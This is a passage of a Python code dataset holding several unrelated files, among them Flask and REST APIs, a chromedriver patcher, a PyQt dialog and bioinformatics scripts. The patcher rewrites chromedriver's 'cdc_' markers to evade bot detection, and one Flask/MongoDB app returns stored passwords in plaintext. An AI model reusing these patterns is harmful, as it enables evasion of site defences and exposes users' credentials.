num_of_elt):\n\t\t\tfid.write('3 %d %d %d\\n' %(model.mesh.elements[elt,0]-1,model.mesh.elements[elt,1]-1,model.mesh.elements[elt,2]-1))\n\t\t\n\t\tfid.write('CELL_TYPES %d\\n' %num_of_elt)\n\t\tfor elt in range(0, num_of_elt):\n\t\t\tfid.write('%d\\n' %celltype)\n\n\t\tfid.write('POINT_DATA %s \\n' %str(num_of_points))\n\t\n\t\t#loop over the different solution structures\n\t\tif 'solnames' in locals():\n\t\t\tfor sol in solnames:\n\t\t\t\t#dealing with results on different timesteps\n\t\t\t\tif(np.size(res_struct.__dict__[sol])>timestep):\n\t\t\t\t\ttimestep = step\n\t\t\t\telse:\n\t\t\t\t\ttimestep = np.size(res_struct.__dict__[sol])\n\t\t\t\t\n\t\t\t\t#getting the fields in the solution\n\t\t\t\tif(np.size(res_struct.__dict__[sol])>1):\n\t\t\t\t\tfieldnames=dict.keys(res_struct.__dict__[sol].__getitem__(timestep-1).__dict__)\n\t\t\t\telse:\n\t\t\t\t\tfieldnames=dict.keys(res_struct.__dict__[sol].__dict__)\n\t\t\t\t#check which field is a real result and print\n\t\t\t\tfor field in fieldnames:\n\t\t\t\t\tif(np.size(res_struct.__dict__[sol])>1):\n\t\t\t\t\t\tfieldstruct=res_struct.__dict__[sol].__getitem__(timestep-1).__dict__[field]\n\t\t\t\t\telse:\n\t\t\t\t\t\tfieldstruct=res_struct.__dict__[sol].__dict__[field]\n\n\t\t\t\t\tif ((np.size(fieldstruct))==num_of_points):\n\t\t\t\t\t\tfid.write('SCALARS %s float 1 \\n' % field)\n\t\t\t\t\t\tfid.write('LOOKUP_TABLE default\\n')\n\t\t\t\t\t\tfor node in range(0,num_of_points):\n\t\t\t\t\t\t\t#paraview does not like NaN, replacing\n\t\t\t\t\t\t\tif np.isnan(fieldstruct[node]):\n\t\t\t\t\t\t\t\tfid.write('%e\\n' % -9999.9999)\n\t\t\t\t\t\t\t#also checking for very small values that mess up\n\t\t\t\t\t\t\telif (abs(fieldstruct[node])<1.0e-20):\n\t\t\t\t\t\t\t\tfid.write('%e\\n' % 0.0)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tfid.write('%e\\n' % fieldstruct[node])\n\t\t\t\t\t\n\t\t#loop on arguments, if something other than result is asked, do\n\t\t#it now\n\t\tfor other in args:\n\t\t\tother_struct=model.__dict__[other]\n\t\t\tothernames=(dict.keys(other_struct.__dict__))\n\t\t\tfor field in othernames:\n#\t\t\t\tfprintf(fid,s,res_struct.(fieldnames{k})(IsEnveloppe));\n\t\t\t\tif ((np.size(other_struct.__dict__[field]))==num_of_points):\n\t\t\t\t\tfid.write('SCALARS %s float 1 \\n' % field)\n\t\t\t\t\tfid.write('LOOKUP_TABLE default\\n')\n\t\t\t\t\tfor node in range(0,num_of_points):\n\t\t\t\t\t\t#paraview does not like NaN, replacing\n\t\t\t\t\t\tif np.isnan(other_struct.__dict__[field][node]):\n\t\t\t\t\t\t\tfid.write('%e\\n' % -9999.9999)\n\t\t\t\t\t\t#also checking for very small values that mess up\n\t\t\t\t\t\telif (abs(other_struct.__dict__[field][node])<1.0e-20):\n\t\t\t\t\t\t\tfid.write('%e\\n' % 0.0)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfid.write('%e\\n' % other_struct.__dict__[field][node])\n\tfid.close()\n","sub_path":"trunk/src/m/contrib/defleurian/paraview/enveloppeVTK.py","file_name":"enveloppeVTK.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"599522341","text":"try:\n    from setuptools import setup\nexcept ImportError:\n    from distutils.core import setup\n\nconfig = {\n    'name': 'termite',\n    'description': 'A simple tool to find intrinsic terminators in a nucleotidic bacterial genome using Machine Learning.',\n    'author': 'Miravet-Verde, Samuel',\n    'url': '',\n    'download_url': 'https://github.com/smv818vms/termite',\n    'author_email': 'samuel.miravet@crg.eu',\n    'version': '0.0.1',\n    'license': \"MIT\",\n    'install_requires': ['Biopython', 'numpy'],\n    'packages': ['termite'],\n    
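# command-line entry point installed by setup()\n    'scripts': 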
['bin/termite']\n}\n\nsetup(**config)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"297025932","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport base64\nimport numpy as np\nfrom PIL import Image\nimport requests\nimport io\nimport matplotlib.pylab as plb\nfrom keras.models import load_model\nfrom flask import request, jsonify, Flask\nfrom measures import measures\n\n# In[2]:\n\n\napp = Flask(__name__)\n# In[3]:\n\n\ndef get_model():\n global model\n model = load_model('my_ResNet50_model.h5')\n print(\"Model loaded\")\n\n\n# In[4]:\n\n\ndef download_image_preprocess(url,target_size):\n r = requests.get(url, timeout=4.0)\n if r.status_code != requests.codes.ok:\n assert False, 'Status code error: {}.'.format(r.status_code)\n\n with Image.open(io.BytesIO(r.content)) as im:\n im = im.resize(target_size)\n I = np.asarray(im)\n #print(\"Before expanding\" , I.shape)\n #plb.imshow(I)\n I = np.expand_dims(I,axis=0)\n #print(\"After Expanding \",I.shape)\n return I\n\n\n# In[5]:\n\n\nprint(\"Loading keras model....\")\nget_model()\n\n\n# In[6]:\n\n\nimg = download_image_preprocess(\"https://firebasestorage.googleapis.com/v0/b/fir-authui-9c7da.appspot.com/o/crop_photo%2F1a2da798-3f89-4379-90b0-d04951adb782___FAM_L.Blight%203645.JPG?alt=media&token=2eb586d7-d849-4053-b895-68a14880c681\",target_size=(227,227))\nprint(\"Function returned \", img.shape)\n#plb.imshow(img[0])\nprint(\"It worked internally\")\n\n\n# In[7]:\n\n\nprediction = model.predict(img)\nprint(prediction.argmax())\n\n\n# In[6]:\n\ncropDisease={\n0:\"apple_scab\",\n1:\"apple_Black_rot\",\n2:\"apple_cedar_apple_rust\",\n3:\"apple_Healthy\",\n4:\"blueberry_Healthy\",\n5:\"cherry_Powdery_Mildew\",\n6:\"cherry_Healthy\",\n7:\"corn_Grayspot\",\n8:\"corn_Common_rust\",\n9:\"corn_Northern_Leaf_Blight\",\n10:\"corn_Healthy\",\n11:\"grape_Black_rot\",\n12:\"grape_Black_Measles\",\n13:\"grape_Leaf_blight_(Isariopsis_Leaf_Spot)\",\n14:\"grape_Healthy\",\n15:\"orange_Haunglongbing_(Citrus_greening)\",\n16:\"peach_Bacterial_spot\",\n17:\"peach_Healthy\",\n18:\"bellpepper_Bacterial_spot\",\n19:\"bellpepper_Healthy\",\n20:\"potato_Early_blight\",\n21:\"potato_Late_blight\",\n22:\"potato_Healthy\",\n23:\"raspberry_healthy\",\n24:\"soybean_healthy\",\n25:\"squash_Powdery_mildew\",\n26:\"strawberry_Leaf_scorch\",\n27:\"strawberry_Healthy\",\n28:\"tomato_Bacterial_spot\",\n29:\"tomato_Early_blight\",\n30:\"tomato_Late_blight\",\n31:\"tomato_Leaf_Mold\",\n32:\"tomato_Septoria_leaf_spot\",\n33:\"tomato_Spider_mites\",\n34:\"tomato_Target_Spot\",\n35:\"tomato_Tomato_Yellow_Leaf_Curl_Virus\",\n36:\"tomato_Tomato_mosaic_virus\",\n37:\"tomato_healthy\"\n}\n\n@app.route(\"/predict\" , methods=[\"POST\"])\ndef predict():\n message = request.get_json(force = True)\n url = message['image_url']\n print(\"URL \" , url)\n processed_image = download_image_preprocess(url, target_size=(227,227))\n prediction = model.predict(processed_image)\n prediction = prediction.argmax()\n\n response = {\n 'prediction' : cropDisease[int(prediction)],\n 'measures':measures[int(prediction)]\n }\n \n return jsonify(response)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hey its working. 
Let's try POST methods'\n\nif __name__ == \"__main__\":\n\tapp.run(host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"301662040","text":"from rest_framework.decorators import api_view\n# from rest_framework.reverse import reverse\nfrom rest_framework.response import Response\n\nfrom server.api.v1.utils.utils import get_res\n\n@api_view(['GET'])\ndef api_v1(request):\n    \"\"\"The entry endpoint of our v1 API\"\"\"\n\n    return Response({\n        'commands' : ['lines'],\n\n    })\n\n\n@api_view(['GET'])\ndef get_query_result(request):\n    res = get_res(request)\n    return Response({\n        'commands' : ['lines'],\n\n    })\n","sub_path":"server/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"399485865","text":"\nimport bson\nimport flask\nimport pymongo \n\napp = flask.Flask(__name__)\n\nclient = pymongo.MongoClient()\ndb = client.coffee # use coffee\n\n\n@app.errorhandler(404)\ndef handler_404(err):\n    return '#GO-AWAY'\n\n@app.route('/hello-world')\ndef get_hello_world():\n    return 'hello, world'\n\n@app.route('/users', methods= [ 'GET' ])\ndef get_users():\n    \n    users = [{\n        'id': str(u.get('_id')),\n        'name': u.get('name'),\n        'email': u.get('email'),\n        'password': u.get('password')\n    } for u in db.users.find() ]\n    \n    return flask.jsonify(users)\n\n@app.route('/users', methods = [ 'POST' ])\ndef create_user():\n    \n    db.users.insert(flask.request.json)\n    \n    return flask.jsonify({ \n        'mensagem' : 'user registered'\n    })\n\n@app.route('/users/<userid>', methods = [ 'GET' ])\ndef get_user_by_id(userid):\n    \n    user = db.users.find_one({\n        '_id': bson.ObjectId(userid)\n    })\n    \n    return flask.jsonify({\n        'id': str(user.get('_id')),\n        'name': user.get('name'),\n        'email': user.get('email'),\n        'password': user.get('password')\n    })\n    \n@app.route('/users/<userid>', methods=[ 'PUT', 'PATCH'])\ndef update_user_by_id(userid):\n    \n    user = {\n        '_id' : bson.ObjectId(userid) \n    }\n    db.users.update(user, { \n        '$set' : flask.request.json\n    })\n    \n    user = db.users.find_one({\n        '_id': bson.ObjectId(userid)\n    })\n    \n    return flask.jsonify({\n        'id': str(user.get('_id')),\n        'name': user.get('name'),\n        'email': user.get('email'),\n        'password': user.get('password')\n    })\n    \n@app.route('/users/<userid>', methods= [ 'DELETE' ])\ndef delete_user_by_id(userid):\n    \n    db.users.remove({\n        '_id': bson.ObjectId(userid) \n    })\n    \n    return flask.jsonify({ 'msg' : 'User removed successfully' }) \n\n@app.route('/soma', methods = [ 'POST' ])\ndef soma():\n    numeros = flask.request.json.get('numeros')\n    \n    if not numeros:\n        return 'Key \"numeros\" not found', 400\n    \n    if type(numeros) is not list:\n        return '\"numeros\" must be a list', 400\n    \n    return flask.jsonify({\n        'soma': sum(numeros)\n    }), 200\n    \n    \n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"aula02/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"534077800","text":"from coreapi import Document\nfrom api_star import validators\nfrom api_star.decorators import validate\nfrom api_star.exceptions import NotFound\nfrom api_star.frameworks.falcon import App\nfrom api_star.renderers import CoreJSONRenderer, DocsRenderer\nimport uuid\n\n\napp = App(title='Notes API')\n\n\n
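# Helper for the route handlers below: linear scan of the in-memory notes list;\n# raises NotFound when no note matches the given id.\ndef 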
lookup(note_id):\n for note in notes:\n if note['id'] == note_id:\n return note\n raise NotFound()\n\n\ndef get_id():\n return '%s' % uuid.uuid4()\n\n\nnotes = [\n {'id': get_id(), 'description': 'Meet someone', 'complete': True},\n {'id': get_id(), 'description': 'Walk somewhere', 'complete': False},\n {'id': get_id(), 'description': 'Do something', 'complete': False},\n]\n\n\n@app.get('/', renderers=[CoreJSONRenderer(), DocsRenderer()], exclude_from_schema=True)\ndef schema():\n \"\"\"\n Return the API schema.\n \"\"\"\n return app.schema\n\n\n@app.get('/notes/')\ndef list_notes():\n \"\"\"\n Returns all existing notes.\n \"\"\"\n return notes\n\n\n@app.post('/notes/')\n@validate(description=validators.text(max_length=100))\ndef create_note(description):\n \"\"\"\n Creates a new note.\n\n * description - A short description of the note.\n \"\"\"\n note = {'id': get_id(), 'description': description, 'complete': False}\n notes.insert(0, note)\n return note\n\n\n@app.get('/notes/{note_id}/')\ndef read_note(note_id):\n \"\"\"\n Reads a single note.\n\n * note_id - A unique ID string for the note.\n \"\"\"\n note = lookup(note_id)\n return note\n\n\n@app.put('/notes/{note_id}/')\n@validate(\n description=validators.text(max_length=100),\n complete=validators.boolean()\n)\ndef update_note(note_id, description=None, complete=None):\n \"\"\"\n Update a note.\n\n * note_id - A unique ID string for the note.\n * [description] - A short description of the note.\n * [complete] - True if the task has been completed, false otherwise.\n \"\"\"\n note = lookup(note_id)\n if description is not None:\n note['description'] = description\n if complete is not None:\n note['complete'] = complete\n\n return note\n\n\n@app.delete('/notes/{note_id}/')\ndef delete_note(note_id):\n \"\"\"\n Deletes a note.\n\n * note_id - A unique ID string for the note.\n \"\"\"\n note = lookup(note_id)\n notes.remove(note)\n return ''\n","sub_path":"examples/todo_falcon.py","file_name":"todo_falcon.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"248014625","text":"import io\nimport json\nimport logging\nimport os\nimport random\nimport re\nimport string\nimport sys\nimport zipfile\nfrom distutils.version import LooseVersion\nfrom urllib.request import urlopen, urlretrieve\n\nlogger = logging.getLogger(__name__)\n\nIS_POSIX = sys.platform.startswith((\"darwin\", \"cygwin\", \"linux\"))\n\n\nclass Patcher(object):\n root_dir = os.path.dirname(__file__)\n\n url_repo = \"https://chromedriver.storage.googleapis.com\"\n zip_name = \"chromedriver_%s.zip\"\n exe_name = \"chromedriver%s\"\n\n platform = sys.platform\n if platform.endswith(\"win32\"):\n zip_name %= \"win32\"\n exe_name %= \".exe\"\n if platform.endswith(\"linux\"):\n zip_name %= \"linux64\"\n exe_name %= \"\"\n if platform.endswith(\"darwin\"):\n zip_name %= \"mac64\"\n exe_name %= \"\"\n\n # if platform.endswith(\"win32\"):\n # d = \"~/appdata/roaming/undetected_chromedriver\"\n # elif platform.startswith(\"linux\"):\n # d = \"~/.local/share/undetected_chromedriver\"\n # elif platform.endswith(\"darwin\"):\n # d = \"~/Library/Application Support/undetected_chromedriver\"\n # else:\n # d = \"~/.undetected_chromedriver\"\n # data_path = os.path.abspath(os.path.expanduser(d))\n data_path = os.path.dirname(__file__)\n\n def __init__(self, executable_path=None, force=False, version_main: int = 0, download_version: bool = True):\n \"\"\"\n Args:\n executable_path: None = 
automatic\n            a full file path to the chromedriver executable\n            force: False\n                terminate processes which are holding lock\n            version_main: 0 = auto\n                specify main chrome version (rounded, ex: 82)\n        \"\"\"\n\n        self.force = force\n        self.executable_path = None\n\n        if not executable_path:\n            self.executable_path = os.path.join(self.data_path, self.exe_name)\n\n        if not IS_POSIX:\n            if executable_path:\n                if not executable_path[-4:] == \".exe\":\n                    executable_path += \".exe\"\n\n        self.zip_path = os.path.join(self.data_path, self.zip_name)\n\n        if not executable_path:\n            self.executable_path = os.path.abspath(\n                os.path.join(\".\", self.executable_path)\n            )\n\n        self._custom_exe_path = False\n\n        if executable_path:\n            self._custom_exe_path = True\n            self.executable_path = executable_path\n        self.version_main = version_main\n        self.version_full = None\n\n    def auto(self, executable_path=None, force=False, version_main=None, download_version=True):\n        \"\"\"Find, download, unzip and patch the chromedriver binary in one call.\"\"\"\n        if executable_path:\n            if os.path.exists(executable_path):\n                self.executable_path = executable_path\n                self._custom_exe_path = True\n\n        if self._custom_exe_path:\n            ispatched = self.is_binary_patched(self.executable_path)\n            if not ispatched:\n                return self.patch_exe()\n            else:\n                return\n\n        if force is True:\n            self.force = force\n\n        try:\n            os.unlink(self.executable_path)\n        except PermissionError:\n            if self.force:\n                self.force_kill_instances(self.executable_path)\n                return self.auto(force=not self.force)\n        try:\n            if self.is_binary_patched():\n                # assumes already running AND patched\n                return True\n        except PermissionError:\n            pass\n        # return False\n        except FileNotFoundError:\n            pass\n\n        if version_main:\n            self.version_main = version_main\n            release = self.fetch_release_number()\n            # self.version_main = release.version[0]\n            self.version_full = release\n            # self.unzip_package(self.fetch_package())\n        else:\n            chrome_version = self.get_chrome_version()\n            print(f'Chrome version: {chrome_version}')\n            if chrome_version:\n                release = chrome_version\n                # self.version_main = release.version[0]\n                self.version_full = self.fetch_release_number()\n            else:\n                release = self.fetch_release_number()\n                # self.version_main = release.version[0]\n                self.version_full = release\n            self.version_main = release.version[0]\n            self.unzip_package(self.fetch_package())\n\n        return self.patch()\n\n    def patch(self):\n        self.patch_exe()\n        return self.is_binary_patched()\n\n    def fetch_release_number(self):\n        \"\"\"\n        Gets the latest major version available, or the latest major version of self.version_main if set explicitly.\n        :return: version string\n        :rtype: LooseVersion\n        \"\"\"\n        path = \"/latest_release\"\n        if self.version_main:\n            path += f\"_{self.version_main}\"\n        path = path.upper()\n        logger.debug(\"getting release number from %s\" % path)\n        return LooseVersion(urlopen(self.url_repo + path).read().decode())\n\n    def parse_exe_version(self):\n        with io.open(self.executable_path, \"rb\") as f:\n            for line in iter(lambda: f.readline(), b\"\"):\n                match = re.search(br\"platform_handle\\x00content\\x00([0-9.]*)\", line)\n                if match:\n                    return LooseVersion(match[1].decode())\n\n    def fetch_package(self):\n        \"\"\"\n        Downloads ChromeDriver from source\n        :return: path to downloaded file\n        \"\"\"\n        u = \"%s/%s/%s\" % (self.url_repo, self.version_full.vstring, self.zip_name)\n        logger.debug(\"downloading from %s\" % u)\n        print('Downloading driver from: ', u)\n        dwl_path = os.path.join(self.data_path, self.zip_name)\n        # dwl_path = self.zip_name\n        print('Path to the zip file: ', dwl_path)\n        return urlretrieve(u, dwl_path)[0]\n\n    
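# With the default paths, fetch_package saves the archive next to this module;\n    # unzip_package below then extracts the chromedriver binary and marks it executable.\n    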
def unzip_package(self, fp):\n \"\"\"\n Does what it says\n :return: path to unpacked executable\n \"\"\"\n logger.debug(\"unzipping %s\" % fp)\n # try:\n # os.unlink(self.zip_path)\n # except (FileNotFoundError, OSError):\n # pass\n\n # os.makedirs(self.data_path, mode=0o755, exist_ok=True)\n\n with zipfile.ZipFile(fp, mode=\"r\") as zf:\n zf.extract(self.exe_name, os.path.dirname(self.executable_path))\n os.remove(fp)\n os.chmod(self.executable_path, 0o755)\n return self.executable_path\n\n @staticmethod\n def force_kill_instances(exe_name):\n \"\"\"\n kills running instances.\n :param: executable name to kill, may be a path as well\n :return: True on success else False\n \"\"\"\n exe_name = os.path.basename(exe_name)\n if IS_POSIX:\n r = os.system(\"kill -f -9 $(pidof %s)\" % exe_name)\n else:\n r = os.system(\"taskkill /f /im %s\" % exe_name)\n return not r\n\n @staticmethod\n def gen_random_cdc():\n cdc = random.choices(string.ascii_lowercase, k=26)\n cdc[-6:-4] = map(str.upper, cdc[-6:-4])\n cdc[2] = cdc[0]\n cdc[3] = \"_\"\n return \"\".join(cdc).encode()\n\n def is_binary_patched(self, executable_path=None):\n \"\"\"simple check if executable is patched.\n :return: False if not patched, else True\n \"\"\"\n executable_path = executable_path or self.executable_path\n with io.open(executable_path, \"rb\") as fh:\n for line in iter(lambda: fh.readline(), b\"\"):\n if b\"cdc_\" in line:\n return False\n else:\n return True\n\n def patch_exe(self):\n \"\"\"\n Patches the ChromeDriver binary\n :return: False on failure, binary name on success\n \"\"\"\n logger.info(\"patching driver executable %s\" % self.executable_path)\n\n linect = 0\n replacement = self.gen_random_cdc()\n with io.open(self.executable_path, \"r+b\") as fh:\n for line in iter(lambda: fh.readline(), b\"\"):\n if b\"cdc_\" in line:\n fh.seek(-len(line), 1)\n newline = re.sub(b\"cdc_.{22}\", replacement, line)\n fh.write(newline)\n linect += 1\n return linect\n\n @staticmethod\n def find_chrome_executable():\n \"\"\"\n Finds the chrome, chrome beta, chrome canary, chromium executable\n Returns\n -------\n executable_path : str\n the full file path to found executable\n \"\"\"\n candidates = set()\n if IS_POSIX:\n for item in os.environ.get(\"PATH\").split(os.pathsep):\n for subitem in (\"google-chrome\", \"chromium\", \"chromium-browser\"):\n candidates.add(os.sep.join((item, subitem)))\n if \"darwin\" in sys.platform:\n candidates.update(\n [\"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\"]\n )\n else:\n for item in map(\n os.environ.get, (\"PROGRAMFILES\", \"PROGRAMFILES(X86)\", \"LOCALAPPDATA\")\n ):\n for subitem in (\n \"Google/Chrome/Application\",\n \"Google/Chrome Beta/Application\",\n \"Google/Chrome Canary/Application\",\n ):\n candidates.add(os.sep.join((item, subitem, \"chrome.exe\")))\n for candidate in candidates:\n if os.path.exists(candidate) and os.access(candidate, os.X_OK):\n return os.path.normpath(candidate)\n\n def get_chrome_version(self):\n \"\"\"\n\n :return:\n \"\"\"\n chrome_path = self.find_chrome_executable()\n if chrome_path:\n chrome_dir = os.path.dirname(chrome_path)\n chrome_files = os.listdir(chrome_dir)\n for file in chrome_files:\n math = re.fullmatch('\\d{2,3}\\.0\\.\\d{4}\\.\\d{1,}', file)\n if math:\n chrome_version = math.string\n return LooseVersion(chrome_version)\n else:\n return\n\n def conf_file(self):\n conf_path = os.path.join(self.data_path, 'conf.json')\n if not os.path.exists(conf_path):\n with open(conf_path, 'w', encoding='utf-8') as file:\n conf = {\n 
\"chrome version\": \"\",\n \"chromedriver version\": \"\"\n }\n json.dump(conf, file, indent=4)\n\n def __repr__(self):\n return \"{0:s}({1:s})\".format(\n self.__class__.__name__,\n self.executable_path,\n )\n\n\nif __name__ == '__main__':\n p = Patcher()\n print(p.auto())\n","sub_path":"castom_driver/patcher.py","file_name":"patcher.py","file_ext":"py","file_size_in_byte":10732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"452594676","text":"from PyQt5 import QtWidgets, QtGui, QtCore, QtSql\n\nfrom functions import desktopSizer\nfrom database.database import DBQuery\nfrom widgets.widgets import QTableView, JNewDialog\n\n\nclass ChooseRentDialog(JNewDialog):\n def __init__(self, rec_id, dbHandler, parent=None):\n super().__init__(parent)\n\n self.dbHandler = dbHandler\n\n self.setWindowTitle(\"Choose receipt\")\n h, v = desktopSizer(250, 200)\n self.resize(h, 400)\n\n self.vertLayout = QtWidgets.QVBoxLayout(self)\n\n self.lInfo = QtWidgets.QLabel(\"This payment was allocated to several rents, which\\nwould you like to use as the base for the receipt?\", self)\n\n self.tabRecOptions = QTableView(self)\n self.modelOptions = DBQuery(\"\", self)\n self.tabRecOptions.setModel(self.modelOptions)\n\n self.modelOptions.setQuery(QtSql.QSqlQuery(\"\"\"SELECT RentCode\n FROM income_allocation\n WHERE IncomeID = {}\"\"\".format(rec_id)))\n\n self.tabRecOptions.doubleClicked.connect(self.finish)\n\n self.vertLayout.addWidget(self.lInfo)\n self.vertLayout.addWidget(self.tabRecOptions)\n\n def finish(self, idx):\n self.chosenRentcode = self.modelOptions.data(idx)\n self.accept()\n\n def result(self):\n return self.chosenRentcode\n","sub_path":"income/chooserentdialog.py","file_name":"chooserentdialog.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"467047546","text":"#! 
/powerapps/share/python-anaconda-3.6/bin/python\n\nimport sys\nsys.path.insert(0,'/sternadi/home/volume1/taliakustin/SternLab')\nfrom optparse import OptionParser\nimport os\nimport glob\nimport argparse\nfrom Bio import SeqIO, Seq, SeqRecord\nimport re\nfrom file_utilities import check_filename, check_dirname\nimport seqFileAnalyzer\nimport pandas as pd\n\ndef main(args):\n fasta_file = check_filename(args.fasta)\n gb_file = check_filename(args.gb)\n fasta = list(SeqIO.parse(fasta_file, \"fasta\"))\n output = check_filename(args.output, Truefile=False)\n new_fasta_file = []\n index_text = \"\"\n ids = []\n count = 0\n no_cds = 0\n ambisense_problems = 0\n for g in SeqIO.parse(gb_file, \"gb\"):\n for f in fasta:\n if g.id in f.id and g.description in f.description:\n orientation = []\n cdss = []\n for feature in g.features:\n if feature.type == \"source\":\n mol_type = feature.qualifiers[\"mol_type\"][0]\n if feature.type == \"CDS\":\n is_CDS = True\n orientation.append(feature.location.strand)\n cdss.append(feature.location.extract(g.seq))\n if len(cdss) == 0:\n no_cds += 1\n continue\n if len(set(orientation)) != 1:\n #print(f\"{f.id} is Ambisense\")\n if mol_type == \"viral cRNA\" or mol_type==\"mRNA\":\n new_id = f.id.split(\" \")[0]\n if new_id in ids:\n print(\"PROBLEM!!!\")\n continue\n ids.append(new_id)\n index_text += f\"{new_id} {f.description}\\n\"\n f.id = new_id\n f.description = \"\"\n new_fasta_file.append(f)\n elif mol_type == \"genomic RNA\" or mol_type==\"genomic DNA\":\n f.seq = f.seq.reverse_complement()\n count += 1\n new_id = f.id.split(\" \")[0]\n if new_id in ids:\n print(\"PROBLEM!!!\")\n continue\n ids.append(new_id)\n index_text += f\"{new_id} {f.description}\\n\"\n f.id = new_id\n f.description = \"\"\n new_fasta_file.append(f)\n else:\n print(mol_type)\n raise TypeError(\"problem with ambisense\")\n ambisense_problems+=1\n continue\n else:\n for cds in cdss:\n if cds in f.seq:\n new_id = f.id.split(\" \")[0]\n if new_id in ids:\n print(\"PROBLEM!!!\")\n continue\n ids.append(new_id)\n index_text += f\"{new_id} {f.description}\\n\"\n f.id = new_id\n f.description = \"\"\n new_fasta_file.append(f)\n break\n elif cds.reverse_complement() in f.seq:\n f.seq = f.seq.reverse_complement()\n count += 1\n\n new_id = f.id.split(\" \")[0]\n if new_id in ids:\n print(\"PROBLEM comp!!!\")\n ids.append(new_id)\n index_text += f\"{new_id} {f.description}\\n\"\n f.id = new_id\n f.description = \"\"\n new_fasta_file.append(f)\n break\n\n\n\n\n\n\n print(f\"reverse complemented {count} sequences (out of {len(fasta)} seqneces)\")\n print(f\"number of sequences in new file {len(new_fasta_file)}\")\n print(f\"sequences with no CDS {no_cds}\")\n print(f\"sequences with ambisense problem {ambisense_problems}\")\n SeqIO.write(new_fasta_file, output, \"fasta\")\n output_index = output.split(\".fasta\")[0] + \".index.txt\"\n with open(output_index, \"w\") as handle:\n handle.write(index_text)\n\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--fasta\", type=str,\n help=\"fasta file\", required=True)\n parser.add_argument(\"-g\", \"--gb\", type=str,\n help=\"gene bank file\", required=True)\n parser.add_argument(\"-o\", \"--output\", type=str,\n help=\"output fasta file\", required=True)\n args = parser.parse_args()\n 
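# Example invocation (flag names as defined by the argparse setup above;\n    # file names are illustrative): -f seqs.fasta -g seqs.gb -o oriented.fasta\n    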
main(args)\n\n","sub_path":"TILV_analysis/get_sequences_to_cds_orientation.py","file_name":"get_sequences_to_cds_orientation.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"581952151","text":"\"\"\"Test SectorModel and SectorModelBuilder\n\"\"\"\nfrom copy import copy\nfrom unittest.mock import Mock\n\nimport numpy as np\nfrom pytest import raises\nfrom smif.metadata import Metadata, MetadataSet\nfrom smif.model.scenario_model import ScenarioModel\nfrom smif.model.sector_model import SectorModel, SectorModelBuilder\nfrom smif.parameters import ParameterList\n\n\nclass EmptySectorModel(SectorModel):\n\n def initialise(self, initial_conditions):\n pass\n\n def simulate(self, timestep, data=None):\n return {}\n\n def extract_obj(self, results):\n return 0\n\n\nclass TestCompositeSectorModel():\n\n def test_add_input(self):\n\n model = EmptySectorModel('test_model')\n model.add_input('input_name', [], [], 'units')\n\n inputs = model.model_inputs\n\n assert inputs.names == ['input_name']\n assert inputs.units == ['units']\n\n assert inputs['input_name'] == Metadata('input_name', [], [], 'units')\n\n def test_add_output(self):\n\n model = EmptySectorModel('test_model')\n model.add_output('output_name', Mock(), Mock(), 'units')\n\n outputs = model.model_outputs\n\n assert outputs.names == ['output_name']\n assert outputs.units == ['units']\n\n def test_run_sector_model(self):\n\n model = EmptySectorModel('test_model')\n model.add_input('input_name', [], [], 'units')\n data = {'input_name': [0]}\n actual = model.simulate(2010, data)\n assert actual == {}\n\n def test_scenario_dependencies(self):\n\n scenario_model = ScenarioModel('test_scenario')\n scenario_model.add_output('scenario_output', Mock(), Mock(), 'units')\n data = np.array([[[120.23]]])\n timesteps = [2010]\n scenario_model.add_data(data, timesteps)\n\n model = EmptySectorModel('test_model')\n model.add_input('input_name', Mock(), Mock(), 'units')\n model.add_dependency(scenario_model, 'scenario_output', 'input_name')\n\n assert 'input_name' in model.deps\n assert model.get_scenario_data('input_name') == data\n\n\nclass TestSectorModelBuilder():\n\n def test_add_inputs(self, setup_project_folder):\n\n model_path = str(setup_project_folder.join('models', 'water_supply',\n '__init__.py'))\n\n builder = SectorModelBuilder('test')\n builder.load_model(model_path, 'WaterSupplySectorModel')\n\n inputs = [{'name': 'an_input',\n 'spatial_resolution': 'LSOA',\n 'temporal_resolution': 'annual',\n 'units': 'tonnes'}]\n\n builder.add_inputs(inputs)\n\n assert 'an_input' in builder._sector_model.model_inputs.names\n\n def test_sector_model_builder(self, setup_project_folder):\n model_path = str(setup_project_folder.join('models', 'water_supply',\n '__init__.py'))\n\n register = Mock()\n register.get_entry = Mock(return_value='a_resolution_set')\n\n registers = {'regions': register,\n 'intervals': register}\n\n builder = SectorModelBuilder('water_supply', registers)\n builder.load_model(model_path, 'WaterSupplySectorModel')\n\n assets = [\n {\n 'name': 'water_asset_a',\n 'type': 'water_pump',\n 'attributes': {\n 'capital_cost': 1000,\n 'economic_lifetime': 25,\n 'operational_lifetime': 25\n }\n }\n ]\n builder.add_interventions(assets)\n\n # builder.add_inputs(inputs)\n # builder.add_outputs(outputs)\n\n model = builder.finish()\n assert isinstance(model, 